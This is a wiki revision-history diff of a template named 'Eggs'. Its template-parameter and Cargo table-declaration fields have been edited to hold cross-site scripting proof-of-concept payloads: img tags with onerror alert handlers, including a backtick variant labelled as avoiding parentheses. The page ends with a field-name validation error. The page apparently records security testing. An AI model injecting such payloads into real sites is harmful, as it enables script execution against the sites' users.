Template:Eggs View history

No edit summary
No edit summary
Line 1: Line 1:
<noinclude>
<noinclude>
{{#template_params:<img src='x' onerror="alert`document.domain`">}}
{{#template_params:<img src='x' onerror="alert`XSS POC without ( tags`">}}
{{#cargo_declare:_table=eggs|<img_src='x'_onerror="alert`document.domain`">=Page}}
{{#cargo_declare:_table=eggs|<img_src='x'_onerror="alert`XSS_POC_without_(_tags`">=Page}}
</noinclude><includeonly>{{#cargo_store:_table=eggs}}
</noinclude><includeonly>{{#cargo_store:_table=eggs}}
{{#template_display:_format=standard}}
{{#template_display:_format=standard}}
[[Category:eggs]]
[[Category:eggs]]
</includeonly>
</includeonly>

Revision as of 19:35, 5 February 2023

{{#template_params:<img src='x' onerror="alert`XSS POC without ( tags`">}}

Error: field name "<img_src" cannot contain any of the following characters: .,-'"<>(){}[]\/